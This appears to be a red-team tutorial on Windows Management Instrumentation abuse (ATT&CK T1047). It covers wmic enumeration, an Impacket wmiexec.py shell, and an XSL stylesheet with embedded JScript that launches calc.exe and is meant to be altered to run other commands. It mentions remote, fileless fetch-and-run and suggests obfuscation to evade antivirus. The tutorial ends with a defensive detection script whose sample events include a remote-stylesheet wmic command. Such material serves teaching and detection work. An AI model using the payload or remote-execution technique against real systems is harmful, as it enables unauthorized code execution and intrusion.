Windows Management Instrumentation (WMI)

ID: T1047 Tactic: Execution

Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access, and on Server Message Block (SMB) and the Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.

An adversary can use WMI to interact with local and remote systems and as a means to perform many tactic functions, such as gathering information for Discovery and remote execution of files as part of Lateral Movement.

There are some very useful things we can do with wmic (the WMI command-line tool), both locally and remotely.

Let's start by enumerating locally; we can grab valuable info such as Name, Manufacturer, Model, Domain and Description.

Let's get more detailed and grab more information.

wmic environment list

Great, what about users? Groups?

Any missing Patches?

Let's grab a shell from Linux; we can use wmiexec.py from the Impacket tool package.

Let's see how it looks grabbing the same info through wmiexec.py. Since this is just a cmd shell, we can still enumerate with wmic and the output should be the same.

Let's try to execute code. Here wmic processes XSL files; the nice thing is that, unlike other tools, wmic does not require the .xsl extension on the file when calling it. In this example file we can see that it uses the JScript language to call "calc.exe"; we can change this to our liking to execute other commands.

Example file:

<?xml version='1.0'?>
<stylesheet
    xmlns="http://www.w3.org/1999/XSL/Transform"
    xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder"
    version="1.0">
  <output method="text"/>
  <!-- Microsoft XSLT extension: embedded JScript that runs when the stylesheet is processed -->
  <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]>
  </ms:script>
</stylesheet>

Let's try executing it locally first; it should be something simple, such as popping calc.exe.

What about calling it remotely? The syntax is almost the same; we just need to point it at the URL of our XSL payload.

We can see here that our payload is fetched and executed from our remote host; this is a great way to execute files without having them saved to disk. These examples are very basic, and be aware that they will get caught by AV; one way around this is adding some obfuscation to these files.
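From the defender's side, the behaviour above is easy to spot in process-creation telemetry: wmic.exe only loads a stylesheet through its /format: switch, and the stock formats all resolve to stylesheets shipped in System32\wbem. The following Python triage routine is an added example, not part of the original notes; it assumes events with an "image" and "cmdline" field (Sysmon Event ID 1 style), uses constructed sample events, and treats the BUILTIN_FORMATS set as the allow-list of stock formats.

```python
import re

# Stock wmic output formats (they map to stylesheets shipped in System32\wbem);
# a /format: value outside this set means a custom stylesheet is being loaded.
BUILTIN_FORMATS = {"list", "csv", "table", "xml", "rawxml", "mof", "hform",
                   "htable", "hmof", "value", "textvaluelist", "htable-sortby"}
# Matches /format:"quoted", /format:'quoted' or /format:bare-token
FORMAT_RE = re.compile(r'''/format:\s*(?:"([^"]*)"|'([^']*)'|(\S+))''', re.I)
# URL or UNC path: the stylesheet is fetched over the network, never saved to disk
REMOTE_RE = re.compile(r"^(?:https?|ftp)://|^\\\\", re.I)
SEVERITY = {"local-xsl": "medium", "remote-xsl": "high"}

def classify_wmic(cmdline: str) -> str:
    """Return "no-format", "builtin", "local-xsl" or "remote-xsl" depending on
    what the command line's /format: switch would load."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return "no-format"
    target = next(g for g in m.groups() if g is not None).strip()
    if REMOTE_RE.match(target):
        return "remote-xsl"
    # Built-in keywords may carry an argument (htable-sortby:Name), so compare
    # only the part before the first ':'; the file needs no .xsl extension, so
    # anything that is not a stock keyword is treated as a custom stylesheet.
    keyword = target.split(":", 1)[0].lower()
    return "builtin" if keyword in BUILTIN_FORMATS else "local-xsl"

def triage(events):
    """Alerts for process-creation events where wmic.exe loads a stylesheet
    that is not one of the stock formats; remote sources rank highest."""
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith("\\wmic.exe"):
            continue  # only wmic.exe honours /format:
        verdict = classify_wmic(ev["cmdline"])
        if verdict in SEVERITY:
            alerts.append({"severity": SEVERITY[verdict], "verdict": verdict,
                           "cmdline": ev["cmdline"]})
    return alerts

# Constructed sample process-creation events (hypothetical, not real telemetry)
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
SAMPLE_EVENTS = [
    {"image": WMIC, "cmdline": "wmic computersystem get name,manufacturer,model"},
    {"image": WMIC, "cmdline": "wmic os get /format:list"},
    {"image": WMIC, "cmdline": r'wmic process list /format:"C:\Users\Public\report.txt"'},
    {"image": WMIC, "cmdline": 'wmic os get /format:"http://192.0.2.10/calc.xsl"'},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]
```

Running triage(SAMPLE_EVENTS) flags only the two custom-stylesheet events, the local one as medium and the URL-sourced one as high; the extension-less local file is still caught because the check keys on the /format: value, not on a .xsl suffix.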
